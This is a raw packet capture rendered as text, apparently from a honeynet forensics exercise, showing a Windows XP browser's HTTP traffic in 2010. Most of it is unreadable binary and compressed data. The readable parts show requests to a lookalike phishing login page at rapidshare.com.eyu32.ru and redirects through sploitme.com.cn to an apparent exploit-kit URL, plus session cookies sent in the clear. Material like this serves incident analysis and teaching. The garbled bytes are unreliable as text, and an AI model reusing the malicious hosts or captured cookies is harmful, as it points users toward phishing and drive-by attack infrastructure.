يBCVe)/2塄bf|<=FGQxu$Fc:<8;Zo-Ttk ۭ]R[<76.=L0y~&|fIGvYe$' -FL$x,G +%*3ՏEWSUKP"!w?UldP]k:EtE!N(1ӏ}!3JQ">fXr:ft˰~.;4H孛r8y݆{HИ 9!F_O: 2|3WK*hhclz/7pSFg c)C 묔d2]W$D~BAB2-C҄ kaގ}Ï`HR/DSi4D/K?uYщS5FPhMMUs):֫]Q0eUT*h 0jJu֏ƫ|+ ?,\h^vb*,+= 83T9_Y8~]Es7s. fRVFCY*r=& =Ik&:"kHښ>s$(qIX3#Ƣj3'*UƪMM5ğtPBR qfnE~t޴,]t vW46Lc# vb KI (S|pM ARsహ *l5 b (dلѸ3">2yqML b;@m ]ӃMNxOl鍵ko;͒ind ac6`1i6o9OLMd $JCqӴD.FA`M:m5 Y.Xp/,JƎĭ)v ” r (D]%YǖAPt8fNlmE5W{M^њڄ˘tLp~ùHŨV6Jgc+J T$zg[<7J˨L-)/|<V;=KHt' RT5E\@"Uc PA*vPpEܐ;1bS]~bؿPxar?ziGP#G*(,V꨷P@thL;=- Z]#`9cjf)0p'3?%0us.pC 4Qd\ʰ\ T8UQ#BE[;LeW٢j6 H1^lYo|RUη}90ln#Vd*8KR\ N`A;Zf*+f8SMdLYf଒*H(a%I~sFj И[/bӫgq5߫$npkϗI eID;㈎nm9ڝ@VETUfYC=DħѶ,O܇і5mT`$۰(4 /}Ztd{R 4r3y%[w/Lx#Jٽ^J{@@e<%s upNRaȄ#,XC*UJBt⏈|y2;Z @PB22g4\tY&=`f쟿WOaFѰ<9|4G'd<#@%#޼g<#d~QW)/H9m by)81pilp2DڍI Q߭j/DaŠ y}L7K ! z._n{ ;hag3S/O122We&bg@␚$4+o^L(LCC%^8)Og%Ȟ˻D! ڒ(e>"oMD2s߾fx pRVA]{ޒsxo/ kXb&-_R%Awigd;uI$*OTm Jĭ#ʝBm߶;P"?5z/Gm>wIx}~9ݾ.@SamX8ߎʃPmK6lA pӵ, }F'" S( }ОʼHG5Dڳ`=8 q4GgI)Og3<1tWsvf2H}F;(n66bH4[bǥp6ká%ੜcx/ԇB 6 Y^dEfT3%VQ izogG+gͅ _m4w~v@CC}t72+ ?-'{Q R X)W';f?62`gFRCڀ;*Yi x#ynD Ug"\Rf/keԃB vr!$ˏ(Ѐ A^ZPȊV;=Kvy<<RT5' E(@6 UcAPv+PV;=K]' RT5E]@!Uc PA+vPu"/P.$'X;xy$qQ,5MVGf?wy4XNbBD`(? A6]IuN0u8n~Qo&wQm??~vz{B?~?wݏm9ҋoNϷuu=1cӿim\18Loasp:9?@L&N;:;}߹!gZ{.#>n7ÍsF[{`;i`4+?"wjpgG;[ͯq{+ MűƯl"O _`0jq^`.,T%\!eڲFɅ/uaE)ϗ:;}_Ěyjbvc?9B^kFT8gHL˗Ɨڌ_1 0^=nWmϧ[PMe 3S'XcqFgB\D% Kma(#(2 9rsr[RݝG-\b~Ajor ~ |D;*{?? $}73|fșeR~8l=^ ıpReqYk{KBeAc qWtŅ,Kpܹ%wm(f57[ MCXlѰل/;X#;C9RlͱP`s b~hȠxY =H.'!I¬67sS&\C(@D6 D£aEϧ,ǫiG%B RcEސe|Z:r,{ıA~ۖ9a|)Ei()#>'nJ(#wi9e9u?&OmK4Bmʏ>JΊB*u\.zN`2 Ick*ؗ`}A]n w?dbX@°tWdEb?`%A0#Yp eB={܅'DkXlG[E"YnY&g@N$[R È@cԄ'BXOdF)1RDJam| t}B=a1gzNc:)\ʳZzWӕF~im&ņA_]7qnw~]77wV WcGnzɬ}3v@ul^{w"rnzIX} ]t{V8Ʒ'ݤ1My5vnyxW܉gꛇU{sV;=Kxx' RT5Ej^@hUc PA+vP=GO!( OqvXW dJYQgRdXXàV;=K(<<RT5' E(@6 UcAPv+PGET /fV;=K:_' RT5E_@Uc PA+vPׁIce;~ۖ Xĥ#`d<1r(5S *dK>~;,&GC`e$;R_\/HѩT +n9CsHBּƦ,)LB^eS]b%:F>mr!gpKN~ ,#F>[o~p}t/';zioiwN{?'z'3U*R UTa Y>RT5' E0@6t UdBP TpV;=K""' RT5Ec@Uc PA+ vzP[HTTP/1.1 204 No Content Content-Length: 0 Date: Wed, 21 Jan 2004 19:51:30 GMT Pragma: no-cache Cache-Control: private, no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Content-Type: text/html Server: Golfe X-XSS-Protection: 0 V;=K::' RT5E,d@Ud PB, U`֐V;=K<<RT5' E(@6z UdBP U,P\ DIEGEV;=K RT5' E@4 UdBP U,P|GET /generate_204 HTTP/1.1 Accept: */* Referer: http://www.google.fr/ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: clients1.google.fr Connection: Keep-Alive Cookie: PREF=ID=e2e4041cfce38490:U=d268ee4913870d14:TM=1264084848:LM=1264769134:S=idyeS_ZtlvevQq-B; NID=31=jTf84Bsx_VBZ3zZESENLEMM0EN5d01u_AF2pZK0EIKTFpo4RLNSPmrGdelxrx6WlfXI0OdM0UwqYMdwIS7T4AXzWq7dXkxmQjKFPsc8VCV9JwME0Xzblz3XlEbYWwfzn V;=KF66' RT5E(e@Ud PB, >RT5' E0@H 82CPfջ'p[Y;=Kr ::' RT5E,g@t|82 PC2fջ(`hY;=K0~ <<RT5' E(@N 82CPfջ(2P4GET / Y;=Kؓ ffRT5' EX@ 82CPfջ(2PA^GET /login.php HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive Y;=K 66' RT5E(h@t82 PC2fռXPY;=K ' RT5Ei@n82 PC2fռXP8uHTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:04 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 1508 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html Vmo6_jl![ǒI 5)-֒RT7QcC ~ɻ{Ew :ys޽!n5e88D7%S8_,dw<j:HTbŝP]edJ[׃?r 'I#maJqw:BTFX:Œ;YtRbz Tad]b5ㅢro6Z4RNyF-.u&2H+VH,JhR,&eiTEd/ie ̀[ӄa!_O<7>a>^-^pΓ j)[UA>Oҹ9q%UUO&;s둈؉k%!փ B6 푃9!jag@RpОosNYt>Ff=]Eͣ[0~|83}K0%aCx4k.D^ˮӯ%J~^ٳ>;==o?}dO>X{ܣ33'oW } C{ac З :CE9ΰ%P'[Ԛ9Xc r+/=gs?ѡz4ңW:HCsP/tJupONL%STW- TRHGzh'?禗 Y;=K <<RT5' E(@K 82CPfռX2 PY;=KERT5' E@ 82CPfռX2 PQGET /images/sslstyles.css HTTP/1.1 Accept: */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Tue, 02 Feb 2010 17:38:05 GMT If-None-Match: "5e472-fef-47ea19070f940" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive Y;=K`F66' RT5E(k@t|82 PC2 fսPaY;=KY' RT5E l@s82 PC2 fսPHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:04 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=99 ETag: "5e472-fef-47ea19070f940" Z;=K >>RT5' E0@> 84DP|%p_Z;=K(::' RT5E,m@tt84 PD3|&`Z;=K<<RT5' E(@D 84DP|&3Pp DIEGEZ;=KQQRT5' EC@* 82CPfս2P&GET /images/images/dot.jpg HTTP/1.1 Accept: */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive Z;=K]66' RT5E(n@ty82 PC2fվPdZ;=K RT5' E@ 84DP|&3PlGET /?click=3feb5a6b2f HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive Z;=K#66' RT5E(o@tv84 PD3|PZ;=K\$yy' RT5Ekp@r482 PC2fվPW$HTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:06:04 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 276 Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPMO@WNH4lP Bql ݖx{3o^vV~9,˷5j1*/r~d,E7#p훣HbN`c<,Lh pިsv"Jx'JM`'`y wmx$Qu%8vE*e9Jf,cpۇև;(>Fj:@MNqu;."`eW+%V9fZ;=Km]]RT5' EO@ 82CPf2tP1GET /images/images/terminator_back.png HTTP/1.1 Accept: */* Referer: http://rapidshare.com.eyu32.ru/login.php Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: rapidshare.com.eyu32.ru Connection: Keep-Alive Z;=K66' RT5E(w@tp82 PC2tfªP1Z;=K' RT5Etx@r#82 PC2tfªPoHTTP/1.1 404 Not Found Date: Tue, 02 Feb 2010 19:06:04 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 285 Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 MPN0+Po Ɋ}J =pBn㤪eW3;Y~5{Vz5q5jvl8  H*ƣ1llFr<~PrUw_Pƾ FHEPFa;=K <<RT5' E(@6X UcAPvz+ Pwwwga;=KK<<RT5' E(@6P Uj@P)PQa;=K*'<<RT5' E(@6U UdBP <,Pa;=K/<<RT5' E(@3 82CPfª2PGET /_a;=K_W<<RT5' E(@0 84DP|3,Pfc;=K$, ::' RT5E,z@V@r P?F`r;=Ka VV'_EH6DC4D1B<'_cSc5t='_ 8fd12edd2dc1462<MSFT 5.07 ,./!+r;=K NN'_RT5E@@\  CD,eJB<  '_cSc5  3Q6 r;=K pp'_Eb6DCNB<'_cSc5='_2 6  8fd12edd2dc1462Q8fd12edd2dc1462.<MSFT 5.07 ,./!+r;=K NN'_RT5E@@\  CD,T;B<   '_cSc5  3Q6 r;=Kx <<'_'_  s;=K<<'_'_  B<t;=KM<<'_'_  B<u;=KO@nn'_E`  LiHK) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   u;=K\ <<^'_F(3 "u;=K\ RR'_RT5ED   F(3 "v;=K5ann'_E`  LiHK) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   v;=Kr<<^'_F(3 " DIEGEv;=KRR'_RT5ED   F(3 "w;=Knn'_E`  LiHK) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   w;=K nn'_E`  LjHK( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA   x;=K?Znn'_E`  LEL) FHEPFCELEHFCEPFFFACACACACACACAAA   y;=Konn'_E`  LEL) FHEPFCELEHFCEPFFFACACACACACACAAA   z;=Knn'_E`  LEL) FHEPFCELEHFCEPFFFACACACACACACAAA   z;=KV! nn'_E`  LEL( FHEPFCELEHFCEPFFFACACACACACACAAA   {;=KXnn'_E`  LiDM) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   {;=K?dnn'_E`  LBN) FHEPFCELEHFCEPFFFACACACACACACABO   |;=Knn'_E`  LiDM) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   |;=Knn'_E`  LBN) FHEPFCELEHFCEPFFFACACACACACACABO   };=Knn'_E`  LiDM) DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   };=Knn'_E`  LBN) FHEPFCELEHFCEPFFFACACACACACACABO   };=KT= nn'_E`  LjDM( DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA   };=K|= nn'_E`  LBN( FHEPFCELEHFCEPFFFACACACACACACABO   ~;=K5<<'_'_  ~;=K**'_RT5RT5 '_ ~;=K>>RT5'_E0@ 83RPFӖp~;=K2::'_RT5E,@s83 PR Fӗ`~;=K}<<RT5'_E(@ 83RPFӗ P k~;=K^^RT5'_EP@ 83RPFӗ PGET /catalog/ HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive ~;=KZ66'_RT5E(@s83 PR FԿP4~;=Ki'_E6  uO  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCAA FHEPFCELEHFCEPFFFACACACACACACABNSMB%V#\MAILSLOT\BROWSE8FD12EDD2DC1462~;=K,m'_E&  FP  DIEGEEDBDCEFEEEEDCEEEDDBDEDGDCCA FHEPFCELEHFCEPFFFACACACACACACABNSMB%!!V2\MAILSLOT\BROWSE8FD12EDD2DC1462U~;=K% '_RT5E@n883 PR FԿP.HTTP/1.1 200 OK Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Set-Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7; path=/catalog/; domain=shop.honeynet.sg Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2725 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html iw:;B53zxPǤe`sYږ+M~8K4+Z]t:5 )r0x k߶4};AozߡJz)e9LwOp0j[40];S eĮVjh-D⧶赲5&".6|~MSLytP<Pt-;|` :l[Kۖ.+n2"G6 {|dk -&.B!ɂV/Qѭ0NHpg|,F,3Gmj%.e#Wø< R/4xt B˟>@9H̤{Z;pz 1aZ$9ĎQiK->@0YE윫bm F D2ᣜx#+E,5x QnɍX6؈ g9~^9F5' d،_4. ["@K]zPb8dNTH\J.xe-љ]@k[ 3iYD[hCe,,FmkP G#k15hWˈ7ڦŋ0o ߩY67 1 ,w2vmwmd ږoe)&n;n61~QڕtWN bPxХ :JOR tp`T&(/optvCO~Dd=`mEB7jVSiO‚Ϧ<|,p8KRȮW:Vߐ:gĶD+o(BY4Ӵ4ˌ*a Ъ$#~;=K '_RT5E@n783 PR FԿPʑFsϘ@,]!WS?Y̘4=c+|+>ffU-w"r<,Ǽ6*rZ4{?Lˠ܄&ה˴4bu{:CԏF}ϨȋGjC銗[Roo >x<"F.kEѿmr`.C>$:[p¹N?p}AeTi[# TlJ^H+5^ڣ(=2Gm8 ӣ).spchrW1XF*V"xF,cҵ "x~sFer!Xϒ7Hq!R4x_!de-Rݚڠ*=HNҵN4$QWZţײky"e@}dED 7&~'\1BIxksn6w fYۍi &lKمA:v)+W53嶆$k:9DBoe/9}60Q::=eT'O բ#+jK (m9>fȞzbv :T;-[wwyN=vAu躲 ֌C脤{ˎLzh-&PrXfUQ'e8qMV\Ēwg`RCGŵ6025<vh/)ib CXwĀM& e0cd<b `H(z6Nz5~"  "uq8 LOi{xp1 WSFT@`a1[>A0QVǔ+Ck:u}z&-I ʲLppr*?n!Р#tvs1% ONkmMY#(&+eb;;k t3г46֥w^ W1ORUHڨ/ODNべJ /xs*t+*%*GT8)I D& wI$ ^Aq Tob~;=K <<RT5'_E(@ 83RPFԿ RP~;=K# '_RT5E@rh83 PR RFԿPCMd?eu3=*fKv%(DS'Aׅ}@]&+{EF'{rn|I9ILq?Xiwz|NaѲa᧟?YH|_p5WұzH*s%5ҥw{j= ի`@bu\$):*]ʜ:]N hMػE߼|cH4̬a<W$IeF Hm?*Tn(~G>sv0ʰ0@;⊷k+G3H1\i80LcBILƩgG.gPIzMRyүY|J~;=K#K RT5'_E@r 83RPFԿ Pz|GET /catalog/stylesheet.css HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645ea-16de-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=KK 66'_RT5E( @s83 PR FZP~;=KX >>RT5'_E0@ 83SPp~;=K"h ::'_RT5E, @s83 PS `~;=Kl <<RT5'_E(@ 83SP P3s~;=KNq RT5'_E@f 83SP P4jGET /catalog/images/store_logo.png HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645b7-1f2b-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=Kq 66'_RT5E( @s83 PS dP,~;=K '_RT5E @r83 PS dPOHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=100 ETag: "645b7-1f2b-47e61676d81c0" ~;=KN '_RT5E @r83 PR FZP HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=99 ETag: "645ea-16de-47e61676d81c0" ~;=Kx RT5'_E@a 83SPd P iGET /catalog/images/header_account.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645b1-1b7-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=Ky 66'_RT5E(@s83 PS  P*9~;=K '_RT5E @r83 PS  PHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=99 ETag: "645b1-1b7-47e61676d81c0" ~;=K3 RT5'_E@b 83RPFZ PGET /catalog/images/header_cart.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645d0-217-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K 66'_RT5E(@s83 PR FPM~;=KF '_RT5E @r83 PR FP\HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=98 ETag: "645d0-217-47e61676d81c0" ~;=Ku RT5'_E@\ 83SP P*GET /catalog/images/header_checkout.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645e2-25d-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K 66'_RT5E(@s83 PS P'~;=K# '_RT5E @r83 PS PcIHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=98 ETag: "645e2-25d-47e61676d81c0" ~;=Kw RT5'_E@W 83RPF PGET /catalog/images/infobox/corner_left.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "661c4-7b-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K} 66'_RT5E(@s83 PR F٥P~;=K '_RT5E @r83 PR F٥P&HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=97 ETag: "661c4-7b-47e61676d81c0" ~;=K RT5'_E@^ 83RPF٥ nP'GET /catalog/images/pixel_trans.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645be-2b-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=Kw 66'_RT5E(@s83 PR nFFP@~;=K RT5'_E@N 83SP PHGET /catalog/images/infobox/corner_right_left.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "661c3-34-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K 66'_RT5E(@s83 PS ^P% ~;=K` '_RT5E @r83 PS ^PбHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=97 ETag: "661c3-34-47e61676d81c0" ~;=KX '_RT5E @r83 PR nFFPdHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=96 ETag: "645be-2b-47e61676d81c0" ~;=K0 >>RT5'_E0@ 84TPI[Ep~;=K:C ::'_RT5E,@s84 PTI[F`l~;=KHF <<RT5'_E(@ 84TPI[FP~;=KR RT5'_E@O 83SP^ PgMGET /catalog/images/infobox/arrow_right.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "661c6-45-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=KMS 66'_RT5E(@s83 PS P"~;=KW '_RT5E @r83 PS P&HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=96 ETag: "661c6-45-47e61676d81c0" ~;=KZ RT5'_E@ 84TPI[FP GET /?click=84c090bd86 HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: sploitme.com.cn Connection: Keep-Alive ~;=K 66'_RT5E(@s84 PTI\PJ~;=K RT5'_E@V 83RPFF OPվGET /catalog/images/libemu.png HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sun, 31 Jan 2010 09:11:08 GMT If-None-Match: "41dfd-2b1d-47e723fc3a300" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K 66'_RT5E(@s83 PR OFP~;=K RT5'_E@' 83SP lP%GET /catalog/includes/languages/english/images/buttons/button_quick_find.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "66240-22a-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K 66'_RT5E(@s83 PS lP~;=K '_RT5E @r83 PS lPfHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=95 ETag: "66240-22a-47e61676d81c0" ~;=KO '_RT5E !@r83 PR OFPHTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=95 ETag: "41dfd-2b1d-47e723fc3a300" ~;=KWRT5'_E@A 83SP NPGET /catalog/images/table_background_default.gif HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sat, 30 Jan 2010 13:05:19 GMT If-None-Match: "645ac-36d-47e61676d81c0" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K66'_RT5E("@s83 PS NPY~;=K'_RT5E #@r83 PS NP*HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=94 ETag: "645ac-36d-47e61676d81c0" ~;=K+RT5'_E@O 83RPF 2P؀GET /catalog/images/phoneyc.png HTTP/1.1 Accept: */* Referer: http://shop.honeynet.sg/catalog/ Accept-Language: en-us Accept-Encoding: gzip, deflate If-Modified-Since: Sun, 31 Jan 2010 09:11:29 GMT If-None-Match: "41dfe-400a-47e7241041240" User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: shop.honeynet.sg Connection: Keep-Alive Cookie: osCsid=36c0fdcf047d4adaca4ffb738d263cc7 ~;=K,66'_RT5E($@s83 PR 2FރP?~;=KM'_RT5E %@r83 PR 2FރP?HTTP/1.1 304 Not Modified Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch Connection: Keep-Alive Keep-Alive: timeout=15, max=94 ETag: "41dfe-400a-47e7241041240" ~;=K_'_RT5E&@q84 PTI\PHTTP/1.1 302 Found Date: Tue, 02 Feb 2010 19:06:41 GMT Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch X-Powered-By: PHP/5.2.6-2ubuntu4.6 Cache-Control: no-cache, must-revalidate Expires: Sat, 26 Jul 1997 05:00:00 GMT Location: http://sploitme.com.cn/fg/show.php?s=84c090bd86 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 20 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html ~;=K9RT5'_E@B 83SP 0PGET /catalog/images/infobox/corner_right.gif HTTP/1.1 Accept: */* Referer: 